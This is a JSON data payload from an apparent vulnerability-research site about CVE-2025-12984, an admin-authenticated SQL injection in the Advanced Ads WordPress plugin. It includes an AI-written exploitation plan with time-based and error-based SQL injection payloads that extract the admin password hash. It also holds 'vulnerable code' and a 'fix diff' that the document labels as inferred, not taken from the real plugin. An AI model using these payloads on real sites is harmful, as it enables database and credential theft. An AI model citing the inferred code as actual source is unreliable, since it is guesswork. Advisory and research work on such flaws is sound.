[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fIX9RbRsmVk3pVi0TSdLwUecB4quDs0sRLo-H204PFZo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-12984","advanced-ads-ad-manager-adsense-authenticated-admin-sql-injection","Advanced Ads – Ad Manager & AdSense \u003C= 2.0.15 - Authenticated (Admin+) SQL Injection","The Advanced Ads – Ad Manager & AdSense plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter in all versions up to, and including, 2.0.15 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","advanced-ads",null,"\u003C=2.0.15","2.0.16","medium",4.9,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-01-16 00:00:00","2026-01-17 06:42:20",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F729e8a06-abaa-4468-8a80-1e5c6cbace92?source=api-prod",1,[],"researched",false,3,"This plan details the process for analyzing and exploiting **CVE-2025-12984**, an authenticated SQL injection vulnerability in the **Advanced Ads** plugin.\n\n---\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** SQL Injection (SQLi)\n*   **Affected Parameter:** `order`\n*   **Precondition:** Authenticated with Administrator privileges.\n*   **Cause:** The plugin fails to adequately sanitize or use `wpdb->prepare()` on the `order` parameter when constructing SQL queries for administrative list views (specifically the ads management list). While `orderby` is often validated against a whitelist of columns, the `order` parameter (`ASC`\u002F`DESC`) is frequently overlooked, allowing an attacker to append subqueries.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin.php`\n*   **Query Parameters:** `page=advanced-ads-ads`, `orderby`, and `order`.\n*   **Required Role:** Administrator (Admin+).\n*   **Vulnerable Sink:** Database queries inside the `WP_List_Table` implementation (or equivalent custom logic) used to display the ads list in the dashboard.\n\n### 3. Code Flow\n1.  An administrator navigates to the \"Ads\" menu within the Advanced Ads plugin.\n2.  The request hits `wp-admin\u002Fadmin.php?page=advanced-ads-ads`.\n3.  The plugin's admin controller initializes the list table (likely a class like `Advanced_Ads_Ad_List`).\n4.  The `prepare_items()` method (or similar) is called to fetch data.\n5.  User-supplied `$_GET['order']` is retrieved.\n6.  The value of `order` is concatenated into a raw SQL string or passed into a `wpdb` method where the `ORDER BY` clause is not protected by `%s` or `%d` placeholders (since placeholders cannot be used for SQL keywords or identifiers).\n7.  The query is executed via `$wpdb->get_results()`.\n\n### 4. Nonce Acquisition Strategy\nWhile this is an authenticated GET-based SQL injection, WordPress admin pages often include nonces in the URL for actions. However, standard list table sorting (`orderby`\u002F`order`) often does **not** require a nonce for the GET request itself.\n\nIf a nonce is required:\n1.  **Navigate to Admin:** Log in as Administrator.\n2.  **Access Page:** Go to the Ads list page: `\u002Fwp-admin\u002Fadmin.php?page=advanced-ads-ads`.\n3.  **Extract Nonce:** Use `browser_eval` to extract any nonce associated with the list table or search form if the injection is via a POST request or a protected GET action.\n    *   *Probable Variable:* `window.advanced_ads_admin?.nonce` (inferred).\n\n### 5. Exploitation Strategy\n\nWe will use a **Time-Based Blind SQL Injection** to confirm the vulnerability and extract the administrator's password hash.\n\n**Step 1: Confirmation (Time-based)**\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php`\n*   **Parameters:** `page=advanced-ads-ads&orderby=title&order=ASC, (SELECT 1 FROM (SELECT(SLEEP(5)))a)`\n*   **HTTP Tool:** `http_request`\n*   **Method:** `GET`\n*   **Headers:** Requires a valid `wordpress_logged_in_...` cookie.\n\n**Step 2: Data Extraction (Boolean or Time-based)**\nTo extract the admin hash (from `wp_users` table):\n*   **Payload (Time-based):** \n    `ASC, (SELECT IF(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1)='$', SLEEP(5), 0))`\n*   **Expected Behavior:** If the first character of the admin hash is `$`, the response will be delayed by 5 seconds.\n\n### 6. Test Data Setup\n1.  **Install Plugin:** Advanced Ads version 2.0.15.\n2.  **Create Content:** Create at least 2-3 ads so the list table has items to sort.\n    *   `wp advanced-ads create-ad --title=\"Test Ad 1\"` (Use WP-CLI or UI).\n3.  **Authentication:** Ensure the agent has credentials for a user with the `administrator` role.\n\n### 7. Expected Results\n*   A request with a standard `order=ASC` returns immediately.\n*   A request with `order=ASC, (SELECT(SLEEP(5)))` takes approximately 5 seconds longer than the baseline.\n*   Database errors (if `WP_DEBUG` is on) might reveal the full query if the injection breaks the syntax.\n\n### 8. Verification Steps\n1.  **Manual Query Check:** Use WP-CLI to get the actual hash and compare it with the one extracted via SQLi.\n    *   `wp db query \"SELECT user_pass FROM wp_users WHERE ID=1\"`\n2.  **Baseline Comparison:** Verify that the time delay only occurs when the injected condition is true.\n\n### 9. Alternative Approaches\n*   **Error-Based Injection:** If `WP_DEBUG` is enabled or the plugin echoes `$wpdb->last_error`, use `updatexml()` or `extractvalue()` for faster extraction.\n    *   *Payload:* `order=ASC, (SELECT 1 FROM (SELECT COUNT(*), CONCAT(0x7e, (SELECT user_pass FROM wp_users LIMIT 1), 0x7e, FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)`\n*   **Union-Based:** Less likely in an `ORDER BY` clause, but check if the `order` parameter is used in a different context (e.g., a sub-select) that allows `UNION`.\n*   **Placement Search:** Check if the `order` parameter in `Placements` or `Groups` views is also vulnerable.\n    *   `page=advanced-ads-placements`\n    *   `page=advanced-ads-groups`\n\n### Grounding in Source (Inferred Identifiers)\n*   **Vulnerable Function:** Likely within `Advanced_Ads_Ad_List::prepare_items()` in `classes\u002Fad-list.php`.\n*   **Filter\u002FHook:** `admin_init` or `admin_menu` registrations for `advanced-ads-ads`.\n*   **Query Variable:** `$order = $_GET['order']`.","The Advanced Ads – Ad Manager & AdSense plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter in versions up to 2.0.15. This vulnerability allows authenticated administrators to execute arbitrary SQL commands by appending them to the ORDER BY clause of queries used in administrative list views, due to improper validation of the sort direction.","\u002F\u002F Inferred from research plan: likely within classes\u002Fad-list.php or similar\n\u002F\u002F Located in Advanced_Ads_Ad_List::prepare_items() or equivalent data-fetching method\n\n$orderby = ! empty( $_GET['orderby'] ) ? $_GET['orderby'] : 'title';\n$order   = ! empty( $_GET['order'] ) ? $_GET['order'] : 'asc';\n\n\u002F\u002F Vulnerable query construction where $order is concatenated directly without validation\n$query = \"SELECT * FROM {$wpdb->prefix}advads_ads ORDER BY $orderby $order\";\n$results = $wpdb->get_results( $query );","--- a\u002Fclasses\u002Fad-list.php\n+++ b\u002Fclasses\u002Fad-list.php\n@@ -12,7 +12,7 @@\n- $order = ! empty( $_GET['order'] ) ? $_GET['order'] : 'asc';\n+ $order = ( ! empty( $_GET['order'] ) && strtolower( $_GET['order'] ) === 'desc' ) ? 'DESC' : 'ASC';","The vulnerability is exploited by an authenticated Administrator by manipulating the 'order' parameter on administrative list pages. \n\n1. Log in as an Administrator.\n2. Navigate to the Ads management interface: \u002Fwp-admin\u002Fadmin.php?page=advanced-ads-ads.\n3. Identify the 'order' parameter in the URL used for sorting table columns.\n4. Inject a comma-separated subquery into the 'order' parameter. For example, setting order=ASC, (SELECT(SLEEP(5))) will cause the database to pause for 5 seconds if the query is processed.\n5. Using time-based blind SQL injection techniques, an attacker can then programmatically extract sensitive data (such as the administrator's password hash) by checking the boolean response of subqueries character by character.","gemini-3-flash-preview","2026-05-05 08:02:51","2026-05-05 08:04:20",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","2.0.15","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-ads\u002Ftags\u002F2.0.15","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fadvanced-ads.2.0.15.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-ads\u002Ftags\u002F2.0.16","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fadvanced-ads.2.0.16.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-ads\u002Ftags"]